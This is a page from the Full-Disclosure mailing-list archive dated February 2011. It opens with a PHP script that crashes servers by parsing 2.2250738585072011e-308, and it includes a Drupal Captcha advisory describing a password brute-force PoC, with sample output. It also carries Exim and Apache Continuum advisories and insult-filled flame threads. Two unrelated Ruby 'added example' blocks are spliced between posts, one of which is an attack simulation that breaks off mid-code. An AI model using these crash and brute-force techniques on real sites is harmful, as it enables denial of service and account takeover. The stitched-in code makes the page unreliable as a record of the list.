> > echo 'Start test...';
> > 
> > $f=(float)"2.2250738585072011e-308";
> > echo 'Try 1 => '.$f.'';
> > 
> > $f=floatval("2.2250738585072011e-308");
> > echo 'Try 2 => '.$f.'';
> > 
> > $f="2.2250738585072011e-308";
> > echo 'Try 3 => '.(float)$f.'';
> > 
> > echo 'Test failed, server not vulnerable!';
> > 
> > ?>
> > 
> > All three tests succeeded in crashing the server.
> > 
> > With all due respect, this should NOT have been
> > disclosed without being FIXED (as it seems to me).
> > Plus, I'm a bit amazed such a bug exists in PHP -
> > since converting to floating point is a trivial
> > operation, it should have been limited and
> > safe-guarded from the start.
> > There are a lot of servers out there happily
> > accepting input as floating point values, this bug
> > should be top priority...
> > 
> > 
> > Chris.
> > 
> > 
> > 
> > On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser
> >  wrote:
> > 
> > 
> > 
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > 
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> > 
> > 
> > 
> > 
> > 
> > 
> > 

[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

2011-02-10 Thread Leon Kaiser
From: Leon Kaiser 
Reply-to: litera...@gnaa.eu
To: DiKKy Heartiez 
Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Wed, 09 Feb 2011 20:58:42 -0500

The best part is that gcc devs have refused to fix it for over a decade.

Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer


> On Wed, 2011-02-09 at 19:38 +, DiKKy Heartiez wrote:
> 
> > Breakin' fuckin' news!  (Or not!)  One of those stories is over a
> > month old, the other is over a week old.  Nothing particularly
> > exciting or unexpected in either.  It's just typical GPL code
> > quality.
> > 
> > 
> > 
> > 
> > From: litera...@gmail.com
> > To: full-disclosure@lists.grok.org.uk
> > Date: Wed, 9 Feb 2011 12:40:54 -0500
> > Subject: [Full-disclosure] {Java,PHP} Server Exploits
> > 
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> > 
> > 
> > 
> > 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

2011-02-10 Thread Leon Kaiser
From: Leon Kaiser 
Reply-to: litera...@gnaa.eu
To: Yorian Wiltjer 
Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Thu, 10 Feb 2011 08:34:02 -0500

"Yay open source"?

http://gcc.gnu.org/bugzilla/show_bug.cgi?id=323

Reported:
2000-06-14 14:16 UTC by mirtich
Modified:
2011-01-13 22:06 UTC (History)
Status:
SUSPENDED


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer

On Thu, 2011-02-10 at 11:20 +0100, Yorian Wiltjer wrote: 

> To all,
> 
> 
> PHP version fixed in versions 5.3.5 and 5.2.17, released on Jan 6th
> 2011.
> And the bug is only in the 32-bit version of PHP (even on a 64-bit CPU)
> http://www.php.net/archive/2011.php#id2011-01-06-1
> 
> 
> The Reg reports that Oracle fixed the mark of the beast in their new
> patch, after it has been there for 10 years.
> http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/
> 
> 
> PHP dev team time: one month
> Java developers: about ten years
> 
> 
> So yay open source.
> 
> 
> With friendly greetings,
> Yorian
> 
> 
> PS,
> Don't forget to upgrade
> 
> 2011/2/10 Troy Aerojam 
> 
> > It borders idiocy this hasn't been plugged.
> > 
> > Aerojam
> > 
> > --- On Wed, 2/9/11, Leon Kaiser  wrote:
> > 
> > 
> > From: Leon Kaiser 
> > 
> > Subject: [Full-disclosure] {Java,PHP} Server
> > Exploits
> > 
> > To: full-disclosure@lists.grok.org.uk
> > 
> > Date: Wednesday, February 9, 2011, 5:40 PM
> > 
> > 
> > 
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > 
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> > 
> > 
> > 
> > 
> > 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread Cal Leeming [Simplicity Media Ltd]
Andrew, I'm gonna tell you the same thing my girl tells me when I'm being
a cunt. You need a fucking slap. lol.

On Thu, Feb 10, 2011 at 5:39 PM, Christian Sciberras wrote:

> One question. Who's "you" that you keep referring to all the time?
>
>
>
>
> On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> Thankfully you are very rarely involved with public and private sector
>> business talks in the UK, so the situation will probably never arise that we
>> are in the same board room.
>>
>> Stay in America and keep away from the UK is the best thing that could
>> ever happen to you, because frankly meeting you would be a complete
>> nightmare for me and I would find it hard to work with you on any meaningful
>> level.
>>
>> One thing for sure is you have pissed me off with the way you speak to me
>> via private email and your perceived perception of who I am, and what you
>> think n3td3v is.
>>
>> Maybe in the beginning it seemed like disorganised nonsense to you, but
>> it has evolved and shaped over the years with me and is now a serious force
>> to be reckoned with and is able to compete with other consultancy
>> organisations in the UK, now that there are serious consultants on board
>> from the business and government sector in the UK, where we work on
>> meaningful policy reform within organisations, to tighten security against
>> foreign powers, terrorist attacks and other matters.
>>
>> To be perfectly honest, I would like to say, I think you've been reading
>> mailing lists too much, a lot more goes on in industry than the stupid
>> disclosure community, work actually gets done that is meaningful and
>> satisfying when I come home at night.
>>
>> My advice to you is, stop reading mailing lists, get on with the physical
>> industry and stop basing your views of people on the back and forward
>> horse play people have had between 2004-2009.
>>
>> That part of n3td3v is behind you, me and everyone, I removed the mailing
>> list as a symbolic gesture to move on from that.
>>
>> I'm now a professional, consulting and liaising with other consultants in
>> the UK in the public and private sector through the consortium, the
>> consultants who I've had dealings with in the physical domain who have
>> decided to join through knowing me in a working relationship.
>>
>> The organisation is nothing to do with what it might have been, n3td3v is
>> rethought and matured, along with me.
>>
>> You couldn't possibly say the same organisation I started when I was 18 is
>> going to be the same organisation today now that I'm 30, it isn't.
>>
>> I've changed, we've changed, the type of people I come into contact with has
>> changed through opportunities I've gained in the physical domain.
>>
>> n3td3v is very much nothing to do with anything online-based, but has
>> shifted into the physical domain, in that, its people I actually know who I
>> can shake hands with who are members.
>>
>> That is why the name was changed, the brand, it's now a consortium, it's
>> nothing to do with online or some silly Google group mailing list.
>>
>> The beginning days of n3td3v between 2004-2009 and the Google group
>> mailing list was used to push my name out into the industry to become known,
>> you should be able to work with me in a meaningful working relationship if
>> you ever had to through work commitments.
>>
>>
>> Everyone else who I meet in the physical domain knows who I am, but they
>> don't judge me for it, they shake my hand and move on with the problems in
>> the industry that are needing solved.
>>
>> They don't say, that's Andrew who used to post in the disclosure
>> community, let's huff and puff about it.
>>
>> They take me as I am in the physical domain, realise it was silly horse
>> play from the past and move on.
>>
>> I hope you are able to do the same, because your attitude just annoys me
>> that you cannot have a mature and professional approach in the way you talk
>> with me.
>>
>> Andrew
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread Christian Sciberras
One question. Who's "you" that you keep referring to all the time?




On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> Thankfully you are very rarely involved with public and private sector
> business talks in the UK, so the situation will probably never arise that we
> are in the same board room.
>
> Stay in America and keep away from the UK is the best thing that could ever
> happen to you, because frankly meeting you would be a complete nightmare for
> me and I would find it hard to work with you on any meaningful level.
>
> One thing for sure is you have pissed me off with the way you speak to me
> via private email and your perceived perception of who I am, and what you
> think n3td3v is.
>
> Maybe in the beginning it seemed like disorganised nonsense to you, but it
> has evolved and shaped over the years with me and is now a serious force to
> be reckoned with and is able to compete with other consultancy organisations
> in the UK, now that there are serious consultants on board from the business
> and government sector in the UK, where we work on meaningful policy reform
> within organisations, to tighten security against foreign powers, terrorist
> attacks and other matters.
>
> To be perfectly honest, I would like to say, I think you've been reading
> mailing lists too much, a lot more goes on in industry than the stupid
> disclosure community, work actually gets done that is meaningful and
> satisfying when I come home at night.
>
> My advice to you is, stop reading mailing lists, get on with the physical
> industry and stop basing your views of people on the back and forward
> horse play people have had between 2004-2009.
>
> That part of n3td3v is behind you, me and everyone, I removed the mailing
> list as a symbolic gesture to move on from that.
>
> I'm now a professional, consulting and liaising with other consultants in
> the UK in the public and private sector through the consortium, the
> consultants who I've had dealings with in the physical domain who have
> decided to join through knowing me in a working relationship.
>
> The organisation is nothing to do with what it might have been, n3td3v is
> rethought and matured, along with me.
>
> You couldn't possibly say the same organisation I started when I was 18 is
> going to be the same organisation today now that I'm 30, it isn't.
>
> I've changed, we've changed, the type of people I come into contact with has
> changed through opportunities I've gained in the physical domain.
>
> n3td3v is very much nothing to do with anything online-based, but has
> shifted into the physical domain, in that, its people I actually know who I
> can shake hands with who are members.
>
> That is why the name was changed, the brand, it's now a consortium, it's
> nothing to do with online or some silly Google group mailing list.
>
> The beginning days of n3td3v between 2004-2009 and the Google group mailing
> list was used to push my name out into the industry to become known, you
> should be able to work with me in a meaningful working relationship if you
> ever had to through work commitments.
>
>
> Everyone else who I meet in the physical domain knows who I am, but they
> don't judge me for it, they shake my hand and move on with the problems in
> the industry that are needing solved.
>
> They don't say, that's Andrew who used to post in the disclosure community,
> let's huff and puff about it.
>
> They take me as I am in the physical domain, realise it was silly horse
> play from the past and move on.
>
> I hope you are able to do the same, because your attitude just annoys me
> that you cannot have a mature and professional approach in the way you talk
> with me.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-1060-1] Exim vulnerabilities

2011-02-10 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1060-1 February 10, 2011
exim4 vulnerabilities
CVE-2010-2023, CVE-2010-2024, CVE-2010-4345, CVE-2011-0017
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  exim4-daemon-custom 4.60-3ubuntu3.3
  exim4-daemon-heavy  4.60-3ubuntu3.3
  exim4-daemon-light  4.60-3ubuntu3.3

Ubuntu 8.04 LTS:
  exim4-daemon-custom 4.69-2ubuntu0.3
  exim4-daemon-heavy  4.69-2ubuntu0.3
  exim4-daemon-light  4.69-2ubuntu0.3

Ubuntu 9.10:
  exim4-daemon-custom 4.69-11ubuntu4.2
  exim4-daemon-heavy  4.69-11ubuntu4.2
  exim4-daemon-light  4.69-11ubuntu4.2

Ubuntu 10.04 LTS:
  exim4-daemon-custom 4.71-3ubuntu1.1
  exim4-daemon-heavy  4.71-3ubuntu1.1
  exim4-daemon-light  4.71-3ubuntu1.1

Ubuntu 10.10:
  exim4-daemon-custom 4.72-1ubuntu1.1
  exim4-daemon-heavy  4.72-1ubuntu1.1
  exim4-daemon-light  4.72-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

ATTENTION: This security update brings changes to Exim's behaviour. Please
review the following information carefully, as your Exim configuration may
need to be adjusted after applying this update.

Exim no longer runs alternate configuration files specified with the -C
option as root. The new /etc/exim4/trusted_configs file can be used to
override this new behaviour. Files listed in trusted_configs and owned by
root will be run with root privileges when using the -C option.

In addition, Exim no longer runs as root when the -D option is used. Macro
definitions that require root privileges should now be placed in trusted
configuration files.

Please see the /usr/share/doc/exim4-*/NEWS.Debian file for detailed
information.

Details follow:

It was discovered that Exim contained a design flaw in the way it processed
alternate configuration files. An attacker that obtained privileges of the
"Debian-exim" user could use an alternate configuration file to obtain
root privileges. (CVE-2010-4345)

It was discovered that Exim incorrectly handled certain return values when
handling logging. A local attacker could use this flaw to obtain root
privileges. (CVE-2011-0017)

Dan Rosenberg discovered that Exim incorrectly handled writable sticky-bit
mail directories. If Exim were configured in this manner, a local user
could use this flaw to cause a denial of service or possibly gain
privileges. This issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, 9.10,
and 10.04 LTS. (CVE-2010-2023)

Dan Rosenberg discovered that Exim incorrectly handled MBX locking. If
Exim were configured in this manner, a local user could use this flaw to
cause a denial of service or possibly gain privileges. This issue only
applied to Ubuntu 6.06 LTS, 8.04 LTS, 9.10, and 10.04 LTS. (CVE-2010-2024)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60-3ubuntu3.3.diff.gz
  Size/MD5:   346884 ecd59d3af2c9db2c15fef1febb99798d

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60-3ubuntu3.3.dsc
  Size/MD5: 1710 881d571f9f38d7aec13b78619798
http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60.orig.tar.gz
  Size/MD5:  2022260 5f8e5834c648ac9a62bb8ab6ad2a6227

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-config_4.60-3ubuntu3.3_all.deb
  Size/MD5:   260742 e256c04ffcb8a31d70296cfb64c15ae2

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.60-3ubuntu3.3_all.deb
  Size/MD5: 1580 09fa48896e5245db79e85ccac3cf998f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-base_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:   881218 7780d0cbd71c8d6c5c8716cbb5d7f72e

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-daemon-heavy_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:   472702 91a9f584dea36af8d94a869f82253277

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-daemon-light_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:   417906 f408870290d8a53798fb74e4d1fe9a97

http://security.ubuntu.com/ubuntu/pool/main/e/exim4/eximon4_4.60-3ubuntu3.3_amd64.deb
  Size/MD5:88096 348f9bf5f1d0b7d2656b51eabd09cce4

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4-base_4.60-3ubuntu3.3_i386.deb
  Size/MD5:   880976 935da8d989fb9d1797acd0182fa091c3

http://security.ubunt
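
The USN above says that, after this update, a file given to Exim with -C only runs with root privileges if it is listed in /etc/exim4/trusted_configs and owned by root. The following is an added example, not Exim or Ubuntu code, of the audit an administrator would run after applying the update: it walks the trusted_configs list and reports any entry that does not meet the rule. The path is the one the notice names; skipping blank lines and # comments, and treating a group- or world-writable config as untrusted (stricter than the "owned by root" wording), are this example's own assumptions.

```ruby
# Added example: audit the Exim trusted_configs list described in USN-1060-1.
# Not Exim's or Ubuntu's code. Reports each listed file that should not be
# trusted to run as root via "exim4 -C <file>".

TRUSTED_CONFIGS = '/etc/exim4/trusted_configs'  # path named in the USN

# Returns an array of [path, reason] pairs; an empty array means every listed
# file is a root-owned regular file that nobody else can write to.
def audit_trusted_configs(list_path = TRUSTED_CONFIGS)
  return [[list_path, 'trusted_configs missing']] unless File.exist?(list_path)

  problems = []
  File.foreach(list_path) do |line|
    path = line.strip
    next if path.empty? || path.start_with?('#')   # assumption: comments/blank lines tolerated

    unless File.file?(path)
      problems << [path, 'listed but not a regular file']
      next
    end

    st = File.stat(path)
    # The USN's rule: only root-owned files listed here run as root with -C.
    problems << [path, "owned by uid #{st.uid}, not root"] unless st.uid.zero?
    # Assumption beyond the USN text: a config anyone else can edit is not trustworthy either.
    if (st.mode & 0o022) != 0
      problems << [path, format('mode %04o is group/world-writable', st.mode & 0o7777)]
    end
  end
  problems
end

if __FILE__ == $0
  findings = audit_trusted_configs
  findings.each { |path, why| warn "UNTRUSTED #{path}: #{why}" }
  puts 'trusted_configs OK' if findings.empty?
end
```

Run it as root on an updated host; any line it prints is a file that either will not be run as root (and so may silently break an `exim4 -C` invocation) or should not be in the list at all.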

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread Michael Cassano
> sleeper agents.  Think about that.. and who *else* might be part of the
> conspiracy.  It could go deeper than even Andrew realizes...
>

Gregory.  D. Evans.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2010-3449: Apache Continuum CSRF vulnerability

2011-02-10 Thread Brett Porter
CVE-2010-3449: Apache Continuum CSRF vulnerability

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Continuum 1.3.6
Continuum 1.4.0 (Beta)
The unsupported versions Continuum 1.1 - 1.2.3.1 are also affected.

Description:
Administrators are able to change any user's password, but the
source of the request is not verified, making the behaviour
susceptible to CSRF.

Mitigation:
Continuum 1.3.6 and earlier users should upgrade to 1.3.7

Continuum 1.4.0 (Beta) users should apply the following patch:
http://svn.apache.org/viewvc?view=revision&revision=1066010

Credit:
This issue was discovered by Anatolia Security Research Group

References:
http://continuum.apache.org/security.html

--
Brett Porter
br...@apache.org
http://brettporter.wordpress.com/
http://au.linkedin.com/in/brettporter




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread James Rankin
The guy is a feeble Jock troll who obviously thought this whole "National
Security" thing would get him laid.

I have to admit grudging admiration for his tenacity in that he is still
trying to make it work. Determination alone, though, does not an infosec
professional make.

On 10 February 2011 15:22,  wrote:

> On Thu, 10 Feb 2011 14:49:15 +0100, Christian Sciberras said:
> > Why didn't we all think about it in the first place!
> > A conspiracy, so OBVIOUS!!
>
> > On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> > andrew.wall...@rocketmail.com> wrote:
> > > It is obvious they don't want people like me and my organisation who
> deal
> > > in national security on the list, that is why the moderation was
> > > implemented.
>
> Yep, some huge shadowy "national security organization" that nobody but the
> leader admits being a part of, it must be a conspiracy.  I wonder who out
> there
> is a sleeper agent.  Consider Gadi Evron, Marcus Sachs, and myself -
> Andrew's
> done so much to distance himself from all three of us that we must all be
> sleeper agents.  Think about that.. and who *else* might be part of the
> conspiracy.  It could go deeper than even Andrew realizes...
>
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] CVE-2011-0533: Apache Continuum cross-site scripting vulnerability

2011-02-10 Thread Brett Porter
CVE-2011-0533: Apache Continuum cross-site scripting vulnerability

Severity: Important

Vendor: 
The Apache Software Foundation

Versions Affected:
Continuum 1.3.6
Continuum 1.4.0 (Beta)
The unsupported versions Continuum 1.1 - 1.2.3.1 are also affected.

Description:
A request that included a specially crafted request parameter could be
used to inject arbitrary HTML or JavaScript into Continuum project
pages.

Mitigation:
Continuum 1.3.6 and earlier users should upgrade to 1.3.7

Continuum 1.4.0 (Beta) users should apply the following patch:
http://svn.apache.org/viewvc?view=revision&revision=1066056

Credit:
This issue was discovered by Tal Be'ery of Imperva.

References:
http://continuum.apache.org/security.html

--
Brett Porter
br...@apache.org
http://brettporter.wordpress.com/
http://au.linkedin.com/in/brettporter




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread Valdis . Kletnieks
On Thu, 10 Feb 2011 14:49:15 +0100, Christian Sciberras said:
> Why didn't we all think about it in the first place!
> A conspiracy, so OBVIOUS!!

> On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
> > It is obvious they don't want people like me and my organisation who deal
> > in national security on the list, that is why the moderation was
> > implemented.

Yep, some huge shadowy "national security organization" that nobody but the
leader admits being a part of, it must be a conspiracy.  I wonder who out there
is a sleeper agent.  Consider Gadi Evron, Marcus Sachs, and myself - Andrew's
done so much to distance himself from all three of us that we must all be
sleeper agents.  Think about that.. and who *else* might be part of the
conspiracy.  It could go deeper than even Andrew realizes...


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread huj huj huj
remember to put on the tinfoil hat!

2011/2/10 Christian Sciberras 

> Hahaha!
>
> Why didn't we all think about it in the first place!
> A conspiracy, so OBVIOUS!!
>
> Great way to start my day..
>
> Chris.
>
> On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>>  On Tue, Feb 8, 2011 at 9:38 PM, David Klein 
>> wrote:
>>  > I am sure you can see at this point it becomes complicated. What if an
>> issue
>> > compromising national security gets posted (wetdream) would the
>> moderator
>> > remove it or keep it?
>>
>> It is obvious they don't want people like me and my organisation who deal
>> in national security on the list, that is why the moderation was
>> implemented.
>>
>> Andrew
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread Christian Sciberras
Hahaha!

Why didn't we all think about it in the first place!
A conspiracy, so OBVIOUS!!

Great way to start my day..

Chris.

On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Tue, Feb 8, 2011 at 9:38 PM, David Klein 
> wrote:
> > I am sure you can see at this point it becomes complicated. What if an
> issue
> > compromising national security gets posted (wetdream) would the moderator
> > remove it or keep it?
>
> It is obvious they don't want people like me and my organisation who deal
> in national security on the list, that is why the moderation was
> implemented.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [AntiSnatchOr] Drupal <= 6.20 insecure Captcha defaults PoC

2011-02-10 Thread Michele Orru

Drupal <= 6.20 insecure Captcha defaults PoC

 Name: Drupal <= 6.20 insecure Captcha defaults PoC
 Systems Affected: Drupal <= 6.20 with Captcha <= 2.3
 Severity: Medium
 Vendor: http://drupal.org
 Advisory: http://antisnatchor.com/Drupal_insecure_Captcha_defaults_PoC
 Author: Michele "antisnatchor" Orrù (michele.orru AT antisnatchor DOT com)
 Date: 20110210

I. BACKGROUND
Drupal is a widely used open-source CMS written in PHP: being very
flexible and easy to extend, it is the de facto choice for many small
and large websites/portals that need a robust framework on which to
model their business.

II. DESCRIPTION
Many Drupal users use Captcha challenges (especially with reCaptcha) on their
websites to protect sensitive resources from bots and spammers.
In fact, we have always read about and seen Captcha (Drupal or not) implemented
to protect sensitive forms from online dictionary and brute-forcing attacks.

The default configuration of the Persistence options for the Captcha module
in Drupal is insecure: the persistence option is set to "Omit challenges in a
multi-step/preview workflow once the user successfully responds to a
challenge."

This means the following: if I am able to correctly solve the first Captcha
challenge in the login form, but the login credentials are invalid, there will
be no new Captcha challenge to solve in the login form presented in the HTTP
response. In this situation it is possible to automate a dictionary/brute-forcing
attack: one solved challenge is enough for the whole wordlist.



III. ANALYSIS
I've attached a Ruby PoC, written in two hours, that automates a password-guessing
attack against a known username. The code is commented enough, but basically,
having the cookie, the form anti-XSRF token and the captcha token/sid, the
brute-forcing can be automated. These values should be changed in the code so
that the first request is valid and contains the right captcha sid and cookie:
the subsequent captcha/form tokens will be parsed from each response and added
to the following HTTP requests automatically.


An example of the output:
/opt/local/bin/ruby -e $stdout.sync=true;$stderr.sync=true;load($0=ARGV.shift) /Users/antisnatchor/WORKS/BEEF/drupal-intruder/drupal_captcha_intruder.rb

+Initial xsrf token [form-43fb0bcbcb140066a782a3fc23ab1ab7]
+Initial captcha token [d853d6df05f6c6a956a46f20c8fe20aa]
+Dictionary attack with [4] passwords
+Testing password [test1]
+Request headers = {"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;", "Referer"=>"http://antisnatchor.com/user", "Content-Type"=>"application/x-www-form-urlencoded", "User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}
+Code = 200
+Message = OK
+New xsrf token [form-f83fba9470bf8e3bfa035291b94fcc32]
+New captcha token [aa6e143f8c43c6b1ec87b59f6ab5bf6d]
+Testing password [test2]
+Request headers = {"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;", "Referer"=>"http://antisnatchor.com/user", "Content-Type"=>"application/x-www-form-urlencoded", "User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}
+Code = 200
+Message = OK
+New xsrf token [form-6fba4b48adf6cec02539075edb4fb5f6]
+New captcha token [3e36c79be84a0cdf3a5eefbd0715ecdd]
+Testing password [test3]
+Request headers = {"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;", "Referer"=>"http://antisnatchor.com/user", "Content-Type"=>"application/x-www-form-urlencoded", "User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}
+Code = 200
+Message = OK
+New xsrf token [form-a14e4668b0a8b7fa826bb04d1aa8590a]
+New captcha token [c9a90bbd487de5733b7231ff832c5dd6]
+Testing password [antisnatchor666!]
+Request headers = {"Cookie"=>"SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;", "Referer"=>"http://antisnatchor.com/user", "Content-Type"=>"application/x-www-form-urlencoded", "User-Agent"=>"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"}
+Code = 302
+Message = Moved Temporarily
+Succesfully authenticated user[admin] with password [guessme]

A little note: to try it you need a few Ruby gems, like nokogiri, that you
probably don't have installed by default.


IV. DETECTION

Drupal 6.20 and earlier with the Captcha module 2.3 and earlier, left at the
default persistence setting, are vulnerable.

V. WORKAROUND

Proper configuration of the Drupal flood protection module should mitigate
this issue.
Also changing the Captcha persistence options to "Always add a
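
The attached PoC is not reproduced on this page, so the following is an added example, not the author's code and not Drupal's: a constructed in-memory stand-in for a Drupal 6 login form protected by the Captcha module, with the two persistence settings the advisory names, and the attacker loop the advisory describes (parse the new form token and captcha sid out of every response, feed them into the next request). The field names form_build_id and captcha_sid follow Drupal 6 / Captcha 2.x; everything else about the simulated server (how it tracks solved challenges, its status codes) is this example's assumption. It shows the point of the advisory directly: under the insecure default one solved challenge carries the whole wordlist, while under "always challenge" the attacker is stopped on the second attempt.

```ruby
# Added example (not the author's PoC, not Drupal code): simulate the Captcha
# module's persistence setting and run the dictionary loop from the advisory.
require 'securerandom'

SKIP_ONCE_SOLVED = :omit_after_success  # "Omit challenges ... once the user successfully responds" (insecure default)
ALWAYS_CHALLENGE = :always              # "Always add a challenge"

# Constructed stand-in for a Drupal 6 site with the Captcha module on /user.
class FakeDrupalLogin
  attr_reader :captchas_issued

  def initialize(persistence, user, password)
    @persistence = persistence
    @user, @password = user, password
    @solved = {}           # session => true once a challenge was answered correctly
    @captcha_answers = {}  # captcha_sid => expected answer
    @form_tokens = {}      # form_build_id => not yet consumed
    @captchas_issued = 0
  end

  # GET /user: the login form for this session.
  def get_form(session)
    render(session)
  end

  # A human solving one challenge; the attacker's budget of these is what matters.
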